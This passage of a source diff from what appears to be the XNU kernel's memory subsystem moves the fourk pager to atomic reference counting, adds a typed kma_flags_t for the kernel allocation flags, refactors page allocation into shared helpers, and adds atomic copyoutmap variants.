+               printf("corrupt_text_addr: va 0x%llx\n", (uint64_t)va);
+               printf("corrupt_text_addr: vm_object_trunc_page(va) 0x%llx\n", (uint64_t)vm_object_trunc_page(va));
+               printf("corrupt_text_addr: vm_page_t %p\n", page);
+               printf("corrupt_text_addr: ptoa(PHYS_PAGE) 0x%llx\n", (uint64_t)ptoa(VM_PAGE_GET_PHYS_PAGE(page)));
+               printf("corrupt_text_addr: using physaddr 0x%llx\n", (uint64_t)pa);
+       }
+
+       if (object != VM_OBJECT_NULL) {
+               vm_object_unlock(object);
+       }
+       return kr;
+}
+#endif /* DEBUG || DEVELOPMENT */
index 73bfa3a244f40091447777c6788011a2e8a9b2fe..d815d85a38f3700da2b1a9d64884c46bf3f2f586 100644 (file)
@@ -149,9 +149,13 @@ typedef struct fourk_pager {
 
        /* pager-specific data */
        queue_chain_t           pager_queue;    /* next & prev pagers */
-       unsigned int            ref_count;      /* reference count */
-       int     is_ready;       /* is this pager ready ? */
-       int     is_mapped;      /* is this mem_obj mapped ? */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define fourk_pgr_hdr_ref       fourk_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         fourk_pgr_hdr_ref;
+#endif
+       bool    is_ready;       /* is this pager ready ? */
+       bool    is_mapped;      /* is this mem_obj mapped ? */
        struct fourk_pager_backing slots[FOURK_PAGER_SLOTS]; /* backing for each
                                                              *  4K-chunk */
 } *fourk_pager_t;
@@ -322,8 +326,7 @@ fourk_pager_reference(
        pager = fourk_pager_lookup(mem_obj);
 
        lck_mtx_lock(&fourk_pager_lock);
-       assert(pager->ref_count > 0);
-       pager->ref_count++;
+       os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
        lck_mtx_unlock(&fourk_pager_lock);
 }
 
@@ -401,6 +404,7 @@ fourk_pager_deallocate_internal(
 {
        boolean_t       needs_trimming;
        int             count_unmapped;
+       os_ref_count_t  ref_count;
 
        if (!locked) {
                lck_mtx_lock(&fourk_pager_lock);
@@ -416,9 +420,9 @@ fourk_pager_deallocate_internal(
        }
 
        /* drop a reference on this pager */
-       pager->ref_count--;
+       ref_count = os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
 
-       if (pager->ref_count == 1) {
+       if (ref_count == 1) {
                /*
                 * Only the "named" reference is left, which means that
                 * no one is really holding on to this pager anymore.
@@ -428,7 +432,7 @@ fourk_pager_deallocate_internal(
                /* the pager is all ours: no need for the lock now */
                lck_mtx_unlock(&fourk_pager_lock);
                fourk_pager_terminate_internal(pager);
-       } else if (pager->ref_count == 0) {
+       } else if (ref_count == 0) {
                /*
                 * Dropped the existence reference;  the memory object has
                 * been terminated.  Do some final cleanup and release the
@@ -519,7 +523,7 @@ fourk_pager_map(
 
        lck_mtx_lock(&fourk_pager_lock);
        assert(pager->is_ready);
-       assert(pager->ref_count > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); /* pager is alive */
        if (pager->is_mapped == FALSE) {
                /*
                 * First mapping of this pager:  take an extra reference
@@ -527,7 +531,7 @@ fourk_pager_map(
                 * are removed.
                 */
                pager->is_mapped = TRUE;
-               pager->ref_count++;
+               os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
                fourk_pager_count_mapped++;
        }
        lck_mtx_unlock(&fourk_pager_lock);
@@ -586,7 +590,7 @@ fourk_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &fourk_pager_ops);
        pager = (fourk_pager_t) mem_obj;
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0);
        return pager;
 }
 
@@ -616,7 +620,7 @@ fourk_pager_trim(void)
                prev_pager = (fourk_pager_t)
                    queue_prev(&pager->pager_queue);
 
-               if (pager->ref_count == 2 &&
+               if (os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2 &&
                    pager->is_ready &&
                    !pager->is_mapped) {
                        /* this pager can be trimmed */
@@ -652,13 +656,13 @@ fourk_pager_trim(void)
                    pager_queue);
                pager->pager_queue.next = NULL;
                pager->pager_queue.prev = NULL;
-               assert(pager->ref_count == 2);
+               assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2);
                /*
                 * We can't call deallocate_internal() because the pager
                 * has already been dequeued, but we still need to remove
                 * a reference.
                 */
-               pager->ref_count--;
+               (void)os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
                fourk_pager_terminate_internal(pager);
        }
 }
@@ -680,7 +684,7 @@ fourk_pager_to_vm_object(
                return VM_OBJECT_NULL;
        }
 
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0);
        assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL);
        object = memory_object_control_to_vm_object(pager->fourk_pgr_hdr.mo_control);
        assert(object != VM_OBJECT_NULL);
@@ -718,8 +722,8 @@ fourk_pager_create(void)
        pager->fourk_pgr_hdr.mo_pager_ops = &fourk_pager_ops;
        pager->fourk_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
-       pager->ref_count = 2;   /* existence + setup reference */
-       pager->is_ready = FALSE;/* not ready until it has a "name" */
+       os_ref_init_count_raw(&pager->fourk_pgr_hdr_ref, NULL, 2); /* existence + setup reference */
+       pager->is_ready = FALSE; /* not ready until it has a "name" */
        pager->is_mapped = FALSE;
 
        for (i = 0; i < FOURK_PAGER_SLOTS; i++) {
@@ -792,7 +796,7 @@ fourk_pager_data_request(
 
        pager = fourk_pager_lookup(mem_obj);
        assert(pager->is_ready);
-       assert(pager->ref_count > 1); /* pager is alive and mapped */
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 1); /* pager is alive and mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("fourk_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
 
@@ -821,7 +825,7 @@ fourk_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
 #if __x86_64__ || __arm__ || __arm64__
@@ -1289,7 +1293,7 @@ fourk_pager_populate(
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0);
        assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL);
 
        if (index < 0 || index > FOURK_PAGER_SLOTS) {
index 8bd9c2378c32b96fa7320d3e5423a62a93185966..11ef72463244ff291528812a4fa511c984596745 100644 (file)
@@ -87,9 +87,6 @@ const vm_offset_t vm_max_kernel_address = VM_MAX_KERNEL_ADDRESS;
 TUNABLE(bool, iokit_iomd_setownership_enabled,
     "iokit_iomd_setownership_enabled", true);
 
-vm_offset_t kmapoff_kaddr;
-unsigned int kmapoff_pgcnt;
-
 static inline void
 vm_mem_bootstrap_log(const char *message)
 {
@@ -105,7 +102,7 @@ __startup_func
 void
 vm_mem_bootstrap(void)
 {
-       vm_offset_t     start, end;
+       vm_offset_t start, end, kmapoff_kaddr;
 
        /*
         *      Initializes resident memory structures.
@@ -125,6 +122,8 @@ vm_mem_bootstrap(void)
        vm_mem_bootstrap_log("vm_object_bootstrap");
        vm_object_bootstrap();
 
+       vm_retire_boot_pages();
+
        kernel_startup_initialize_upto(STARTUP_SUB_VM_KERNEL);
 
        vm_mem_bootstrap_log("vm_map_init");
@@ -144,10 +143,11 @@ vm_mem_bootstrap(void)
         * pointer packing schemes using KERNEL_PMAP_HEAP_RANGE_START as a base
         * do not admit this address to be part of any zone submap.
         */
-       kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */
-       if (vm_allocate_kernel(kernel_map, &kmapoff_kaddr,
-           kmapoff_pgcnt * PAGE_SIZE_64, VM_FLAGS_ANYWHERE, VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) {
-               panic("cannot vm_allocate %u kernel_map pages", kmapoff_pgcnt);
+       uint32_t kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */
+       if (kernel_memory_allocate(kernel_map, &kmapoff_kaddr,
+           ptoa(kmapoff_pgcnt), 0, KMA_KOBJECT | KMA_PERMANENT | KMA_VAONLY,
+           VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) {
+               panic("cannot kernel_memory_allocate %u pages", kmapoff_pgcnt);
        }
 
        vm_mem_bootstrap_log("pmap_init");
index 8abf0275c4e5673741261e08195e328ddcd75766..51dd4fe46b4195c887721650b2bda31d7747c446 100644 (file)
@@ -111,7 +111,7 @@ kmem_alloc_contig(
        vm_offset_t             mask,
        ppnum_t                 max_pnum,
        ppnum_t                 pnum_mask,
-       int                     flags,
+       kma_flags_t             flags,
        vm_tag_t                tag)
 {
        vm_object_t             object;
@@ -252,8 +252,8 @@ kernel_memory_allocate(
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_offset_t     mask,
-       int                     flags,
-       vm_tag_t                tag)
+       kma_flags_t     flags,
+       vm_tag_t        tag)
 {
        vm_object_t             object;
        vm_object_offset_t      offset;
@@ -268,14 +268,9 @@ kernel_memory_allocate(
        vm_page_t               wired_page_list = NULL;
        int                     guard_page_count = 0;
        int                     wired_page_count = 0;
-       int                     page_grab_count = 0;
-       int                     i;
        int                     vm_alloc_flags;
        vm_map_kernel_flags_t   vmk_flags;
        vm_prot_t               kma_prot;
-#if DEVELOPMENT || DEBUG
-       task_t                                  task = current_task();
-#endif /* DEVELOPMENT || DEBUG */
 
        if (startup_phase < STARTUP_SUB_KMEM) {
                panic("kernel_memory_allocate: VM is not ready");
@@ -349,64 +344,25 @@ kernel_memory_allocate(
        assert(wired_page_count * PAGE_SIZE_64 == fill_size);
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0);
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START,
+           size, 0, 0, 0);
 #endif
 
-       for (i = 0; i < guard_page_count; i++) {
-               for (;;) {
-                       mem = vm_page_grab_guard();
-
-                       if (mem != VM_PAGE_NULL) {
-                               break;
-                       }
-                       if (flags & KMA_NOPAGEWAIT) {
-                               kr = KERN_RESOURCE_SHORTAGE;
-                               goto out;
-                       }
-                       vm_page_more_fictitious();
+       for (int i = 0; i < guard_page_count; i++) {
+               mem = vm_page_grab_guard((flags & KMA_NOPAGEWAIT) == 0);
+               if (mem == VM_PAGE_NULL) {
+                       kr = KERN_RESOURCE_SHORTAGE;
+                       goto out;
                }
                mem->vmp_snext = guard_page_list;
                guard_page_list = mem;
        }
 
        if (!(flags & (KMA_VAONLY | KMA_PAGEABLE))) {
-               for (i = 0; i < wired_page_count; i++) {
-                       for (;;) {
-                               if (flags & KMA_LOMEM) {
-                                       mem = vm_page_grablo();
-                               } else {
-                                       mem = vm_page_grab();
-                               }
-
-                               if (mem != VM_PAGE_NULL) {
-                                       break;
-                               }
-
-                               if (flags & KMA_NOPAGEWAIT) {
-                                       kr = KERN_RESOURCE_SHORTAGE;
-                                       goto out;
-                               }
-                               if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) {
-                                       kr = KERN_RESOURCE_SHORTAGE;
-                                       goto out;
-                               }
-
-                               /* VM privileged threads should have waited in vm_page_grab() and not get here. */
-                               assert(!(current_thread()->options & TH_OPT_VMPRIV));
-
-                               uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE;
-                               if (unavailable > max_mem || map_size > (max_mem - unavailable)) {
-                                       kr = KERN_RESOURCE_SHORTAGE;
-                                       goto out;
-                               }
-                               VM_PAGE_WAIT();
-                       }
-                       page_grab_count++;
-                       if (KMA_ZERO & flags) {
-                               vm_page_zero_fill(mem);
-                       }
-                       mem->vmp_snext = wired_page_list;
-                       wired_page_list = mem;
+               kr = vm_page_alloc_list(wired_page_count, flags,
+                   &wired_page_list);
+               if (kr != KERN_SUCCESS) {
+                       goto out;
                }
        }
 
@@ -580,12 +536,9 @@ kernel_memory_allocate(
        }
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           wired_page_count, 0, 0, 0);
 #endif
-
        /*
         *      Return the memory, not zeroed.
         */
@@ -602,141 +555,32 @@ out:
        }
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL && kr == KERN_SUCCESS) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           wired_page_count, 0, 0, 0);
 #endif
-
        return kr;
 }
 
-kern_return_t
-kernel_memory_populate(
+void
+kernel_memory_populate_with_pages(
        vm_map_t        map,
        vm_offset_t     addr,
        vm_size_t       size,
-       int             flags,
+       vm_page_t       page_list,
+       kma_flags_t     flags,
        vm_tag_t        tag)
 {
-       vm_object_t             object;
-       vm_object_offset_t      offset, pg_offset;
-       kern_return_t           kr, pe_result;
-       vm_page_t               mem;
-       vm_page_t               page_list = NULL;
-       int                     page_count = 0;
-       int                     page_grab_count = 0;
-       int                     i;
-
-#if DEBUG || DEVELOPMENT
-       task_t                                  task = current_task();
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0);
-#endif
-
-       page_count = (int) (size / PAGE_SIZE_64);
-
-       assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT));
+       vm_object_t     object;
+       kern_return_t   pe_result;
+       vm_page_t       mem;
+       int             page_count = atop_64(size);
 
        if (flags & KMA_COMPRESSOR) {
-               pg_offset = page_count * PAGE_SIZE_64;
-
-               do {
-                       for (;;) {
-                               mem = vm_page_grab();
-
-                               if (mem != VM_PAGE_NULL) {
-                                       break;
-                               }
-
-                               VM_PAGE_WAIT();
-                       }
-                       page_grab_count++;
-                       if (KMA_ZERO & flags) {
-                               vm_page_zero_fill(mem);
-                       }
-                       mem->vmp_snext = page_list;
-                       page_list = mem;
-
-                       pg_offset -= PAGE_SIZE_64;
-
-                       kr = pmap_enter_options(kernel_pmap,
-                           addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem),
-                           VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE,
-                           PMAP_OPTIONS_INTERNAL, NULL);
-                       assert(kr == KERN_SUCCESS);
-               } while (pg_offset);
-
-               offset = addr;
-               object = compressor_object;
-
-               vm_object_lock(object);
-
-               for (pg_offset = 0;
-                   pg_offset < size;
-                   pg_offset += PAGE_SIZE_64) {
-                       mem = page_list;
-                       page_list = mem->vmp_snext;
-                       mem->vmp_snext = NULL;
-
-                       vm_page_insert(mem, object, offset + pg_offset);
-                       assert(mem->vmp_busy);
-
-                       mem->vmp_busy = FALSE;
-                       mem->vmp_pmapped = TRUE;
-                       mem->vmp_wpmapped = TRUE;
-                       mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR;
-               }
-               vm_object_unlock(object);
-
-#if KASAN
-               if (map == compressor_map) {
-                       kasan_notify_address_nopoison(addr, size);
-               } else {
-                       kasan_notify_address(addr, size);
-               }
-#endif
-
-#if DEBUG || DEVELOPMENT
-               VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-               if (task != NULL) {
-                       ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-               }
-#endif
-               return KERN_SUCCESS;
+               panic("%s(%p,0x%llx,0x%llx,0x%x): KMA_COMPRESSOR", __func__,
+                   map, (uint64_t) addr, (uint64_t) size, flags);
        }
 
-       for (i = 0; i < page_count; i++) {
-               for (;;) {
-                       if (flags & KMA_LOMEM) {
-                               mem = vm_page_grablo();
-                       } else {
-                               mem = vm_page_grab();
-                       }
-
-                       if (mem != VM_PAGE_NULL) {
-                               break;
-                       }
-
-                       if (flags & KMA_NOPAGEWAIT) {
-                               kr = KERN_RESOURCE_SHORTAGE;
-                               goto out;
-                       }
-                       if ((flags & KMA_LOMEM) &&
-                           (vm_lopage_needed == TRUE)) {
-                               kr = KERN_RESOURCE_SHORTAGE;
-                               goto out;
-                       }
-                       VM_PAGE_WAIT();
-               }
-               page_grab_count++;
-               if (KMA_ZERO & flags) {
-                       vm_page_zero_fill(mem);
-               }
-               mem->vmp_snext = page_list;
-               page_list = mem;
-       }
        if (flags & KMA_KOBJECT) {
-               offset = addr;
                object = kernel_object;
 
                vm_object_lock(object);
@@ -749,16 +593,15 @@ kernel_memory_populate(
                 *      take reference on object;
                 *      unlock map;
                 */
-               panic("kernel_memory_populate(%p,0x%llx,0x%llx,0x%x): "
-                   "!KMA_KOBJECT",
+               panic("%s(%p,0x%llx,0x%llx,0x%x): !KMA_KOBJECT", __func__,
                    map, (uint64_t) addr, (uint64_t) size, flags);
        }
 
-       for (pg_offset = 0;
+       for (vm_object_offset_t pg_offset = 0;
            pg_offset < size;
            pg_offset += PAGE_SIZE_64) {
                if (page_list == NULL) {
-                       panic("kernel_memory_populate: page_list == NULL");
+                       panic("%s: page_list too short", __func__);
                }
 
                mem = page_list;
@@ -768,11 +611,11 @@ kernel_memory_populate(
                assert(mem->vmp_q_state == VM_PAGE_NOT_ON_Q);
                mem->vmp_q_state = VM_PAGE_IS_WIRED;
                mem->vmp_wire_count++;
-               if (__improbable(mem->vmp_wire_count == 0)) {
-                       panic("kernel_memory_populate(%p): wire_count overflow", mem);
+               if (mem->vmp_wire_count == 0) {
+                       panic("%s(%p): wire_count overflow", __func__, mem);
                }
 
-               vm_page_insert_wired(mem, object, offset + pg_offset, tag);
+               vm_page_insert_wired(mem, object, addr + pg_offset, tag);
 
                mem->vmp_busy = FALSE;
                mem->vmp_pmapped = TRUE;
@@ -799,23 +642,19 @@ kernel_memory_populate(
                assert(pe_result == KERN_SUCCESS);
 
                if (flags & KMA_NOENCRYPT) {
-                       bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE);
+                       __nosan_bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE);
                        pmap_set_noencrypt(VM_PAGE_GET_PHYS_PAGE(mem));
                }
        }
+       if (page_list) {
+               panic("%s: page_list too long", __func__);
+       }
        vm_object_unlock(object);
 
        vm_page_lockspin_queues();
        vm_page_wire_count += page_count;
        vm_page_unlock_queues();
-       vm_tag_update_size(tag, ptoa_64(page_count));
-
-#if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
-#endif
+       vm_tag_update_size(tag, size);
 
 #if KASAN
        if (map == compressor_map) {
@@ -824,20 +663,106 @@ kernel_memory_populate(
                kasan_notify_address(addr, size);
        }
 #endif
-       return KERN_SUCCESS;
+}
 
-out:
-       if (page_list) {
-               vm_page_free_list(page_list, FALSE);
-       }
+kern_return_t
+kernel_memory_populate(
+       vm_map_t        map,
+       vm_offset_t     addr,
+       vm_size_t       size,
+       kma_flags_t     flags,
+       vm_tag_t        tag)
+{
+       vm_object_t             object;
+       vm_object_offset_t      offset, pg_offset;
+       kern_return_t           kr = KERN_SUCCESS;
+       vm_page_t               mem;
+       vm_page_t               page_list = NULL;
+       int                     page_count = atop_64(size);
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL && kr == KERN_SUCCESS) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START,
+           size, 0, 0, 0);
 #endif
 
+       assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT));
+
+       if (flags & KMA_COMPRESSOR) {
+               pg_offset = page_count * PAGE_SIZE_64;
+
+               do {
+                       for (;;) {
+                               mem = vm_page_grab();
+
+                               if (mem != VM_PAGE_NULL) {
+                                       break;
+                               }
+
+                               VM_PAGE_WAIT();
+                       }
+                       if (KMA_ZERO & flags) {
+                               vm_page_zero_fill(mem);
+                       }
+                       mem->vmp_snext = page_list;
+                       page_list = mem;
+
+                       pg_offset -= PAGE_SIZE_64;
+
+                       kr = pmap_enter_options(kernel_pmap,
+                           addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem),
+                           VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE,
+                           PMAP_OPTIONS_INTERNAL, NULL);
+                       assert(kr == KERN_SUCCESS);
+               } while (pg_offset);
+
+               offset = addr;
+               object = compressor_object;
+
+               vm_object_lock(object);
+
+               for (pg_offset = 0;
+                   pg_offset < size;
+                   pg_offset += PAGE_SIZE_64) {
+                       mem = page_list;
+                       page_list = mem->vmp_snext;
+                       mem->vmp_snext = NULL;
+
+                       vm_page_insert(mem, object, offset + pg_offset);
+                       assert(mem->vmp_busy);
+
+                       mem->vmp_busy = FALSE;
+                       mem->vmp_pmapped = TRUE;
+                       mem->vmp_wpmapped = TRUE;
+                       mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR;
+               }
+               vm_object_unlock(object);
+
+#if KASAN
+               if (map == compressor_map) {
+                       kasan_notify_address_nopoison(addr, size);
+               } else {
+                       kasan_notify_address(addr, size);
+               }
+#endif
+
+#if DEBUG || DEVELOPMENT
+               task_t task = current_task();
+               if (task != NULL) {
+                       ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_count);
+               }
+#endif
+       } else {
+               kr = vm_page_alloc_list(page_count, flags, &page_list);
+               if (kr == KERN_SUCCESS) {
+                       kernel_memory_populate_with_pages(map, addr, size,
+                           page_list, flags, tag);
+               }
+       }
+
+#if DEBUG || DEVELOPMENT
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           page_count, 0, 0, 0);
+#endif
        return kr;
 }
 
@@ -847,7 +772,7 @@ kernel_memory_depopulate(
        vm_map_t           map,
        vm_offset_t        addr,
        vm_size_t          size,
-       int                flags,
+       kma_flags_t        flags,
        vm_tag_t           tag)
 {
        vm_object_t        object;
@@ -956,7 +881,7 @@ kmem_alloc_flags(
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_tag_t        tag,
-       int             flags)
+       kma_flags_t     flags)
 {
        kern_return_t kr = kernel_memory_allocate(map, addrp, size, 0, flags, tag);
        if (kr == KERN_SUCCESS) {
@@ -1596,6 +1521,68 @@ copyoutmap(
        return kr;
 }
 
+/*
+ *     Routine:        copyoutmap_atomic{32, 64}
+ *     Purpose:
+ *             Like copyoutmap, except that the operation is atomic.
+ *      Takes in value rather than *fromdata pointer.
+ */
+kern_return_t
+copyoutmap_atomic32(
+       vm_map_t                map,
+       uint32_t                value,
+       vm_map_address_t        toaddr)
+{
+       kern_return_t   kr = KERN_SUCCESS;
+       vm_map_t        oldmap;
+
+       if (vm_map_pmap(map) == pmap_kernel()) {
+               /* assume a correct toaddr */
+               *(uint32_t *)toaddr = value;
+       } else if (current_map() == map) {
+               if (copyout_atomic32(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+       } else {
+               vm_map_reference(map);
+               oldmap = vm_map_switch(map);
+               if (copyout_atomic32(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+               vm_map_switch(oldmap);
+               vm_map_deallocate(map);
+       }
+       return kr;
+}
+
+kern_return_t
+copyoutmap_atomic64(
+       vm_map_t                map,
+       uint64_t                value,
+       vm_map_address_t        toaddr)
+{
+       kern_return_t   kr = KERN_SUCCESS;
+       vm_map_t        oldmap;
+
+       if (vm_map_pmap(map) == pmap_kernel()) {
+               /* assume a correct toaddr */
+               *(uint64_t *)toaddr = value;
+       } else if (current_map() == map) {
+               if (copyout_atomic64(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+       } else {
+               vm_map_reference(map);
+               oldmap = vm_map_switch(map);
+               if (copyout_atomic64(value, toaddr) != 0) {
+                       kr = KERN_INVALID_ADDRESS;
+               }
+               vm_map_switch(oldmap);
+               vm_map_deallocate(map);
+       }
+       return kr;
+}
+
 /*
  *
  *     The following two functions are to be used when exposing kernel
index 2cafcebe2e378b123d1dd46508a5af058c4f2041..5dd4cfda6a08ac9bd3a16d28976a5a2f3a78aa19 100644 (file)
@@ -80,31 +80,39 @@ extern "C" {
 
 #include <kern/locks.h>
 
+struct vm_page;
+
+__options_decl(kma_flags_t, uint32_t, {
+       KMA_NONE        = 0x00000000,
+       KMA_HERE        = 0x00000001,
+       KMA_NOPAGEWAIT  = 0x00000002,
+       KMA_KOBJECT     = 0x00000004,
+       KMA_LOMEM       = 0x00000008,
+       KMA_GUARD_FIRST = 0x00000010,
+       KMA_GUARD_LAST  = 0x00000020,
+       KMA_PERMANENT   = 0x00000040,
+       KMA_NOENCRYPT   = 0x00000080,
+       KMA_KSTACK      = 0x00000100,
+       KMA_VAONLY      = 0x00000200,
+       /*
+        * Pages belonging to the compressor are not on the paging queues,
+        * nor are they counted as wired.
+        */
+       KMA_COMPRESSOR  = 0x00000400,
+       KMA_ATOMIC      = 0x00000800,
+       KMA_ZERO        = 0x00001000,
+       KMA_PAGEABLE    = 0x00002000,
+       KMA_KHEAP       = 0x00004000,  /* Pages belonging to zones backing one of kalloc_heap. */
+});
+
 extern kern_return_t    kernel_memory_allocate(
        vm_map_t        map,
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_offset_t     mask,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
-/* flags for kernel_memory_allocate */
-#define KMA_HERE        0x01
-#define KMA_NOPAGEWAIT  0x02
-#define KMA_KOBJECT     0x04
-#define KMA_LOMEM       0x08
-#define KMA_GUARD_FIRST 0x10
-#define KMA_GUARD_LAST  0x20
-#define KMA_PERMANENT   0x40
-#define KMA_NOENCRYPT   0x80
-#define KMA_KSTACK      0x100
-#define KMA_VAONLY      0x200
-#define KMA_COMPRESSOR  0x400   /* Pages belonging to the compressor are not on the paging queues, nor are they counted as wired. */
-#define KMA_ATOMIC      0x800
-#define KMA_ZERO        0x1000
-#define KMA_PAGEABLE    0x2000
-#define KMA_KHEAP       0x4000  /* Pages belonging to zones backing one of kalloc_heap. */
-
 extern kern_return_t kmem_alloc(
        vm_map_t        map,
        vm_offset_t     *addrp,
@@ -118,7 +126,7 @@ extern kern_return_t kmem_alloc_contig(
        vm_offset_t     mask,
        ppnum_t         max_pnum,
        ppnum_t         pnum_mask,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
 extern kern_return_t    kmem_alloc_flags(
@@ -126,7 +134,7 @@ extern kern_return_t    kmem_alloc_flags(
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_tag_t        tag,
-       int             flags);
+       kma_flags_t     flags);
 
 extern kern_return_t    kmem_alloc_pageable(
        vm_map_t        map,
@@ -169,18 +177,26 @@ extern kern_return_t    kmem_alloc_kobject(
        vm_size_t       size,
        vm_tag_t        tag) __XNU_INTERNAL(kmem_alloc_kobject);
 
+extern void kernel_memory_populate_with_pages(
+       vm_map_t        map,
+       vm_offset_t     addr,
+       vm_size_t       size,
+       struct vm_page *page_list,
+       kma_flags_t     flags,
+       vm_tag_t        tag);
+
 extern kern_return_t kernel_memory_populate(
        vm_map_t        map,
        vm_offset_t     addr,
        vm_size_t       size,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
 extern void kernel_memory_depopulate(
        vm_map_t        map,
        vm_offset_t     addr,
        vm_size_t       size,
-       int             flags,
+       kma_flags_t     flags,
        vm_tag_t        tag);
 
 extern kern_return_t    memory_object_iopl_request(
@@ -224,10 +240,8 @@ extern void             vm_tag_update_size(vm_tag_t tag, int64_t size);
 #if VM_MAX_TAG_ZONES
 
 extern void             vm_allocation_zones_init(void);
-extern void             vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx);
-extern void             vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste);
-
-extern vm_allocation_zone_total_t **   vm_allocation_zone_totals;
+extern vm_tag_t         vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags);
+extern void             vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta);
 
 #endif /* VM_MAX_TAG_ZONES */
 
@@ -299,6 +313,16 @@ extern kern_return_t    copyoutmap(
        vm_map_offset_t toaddr,
        vm_size_t       length);
 
+extern kern_return_t    copyoutmap_atomic32(
+       vm_map_t        map,
+       uint32_t        value,
+       vm_map_offset_t toaddr);
+
+extern kern_return_t    copyoutmap_atomic64(
+       vm_map_t        map,
+       uint64_t        value,
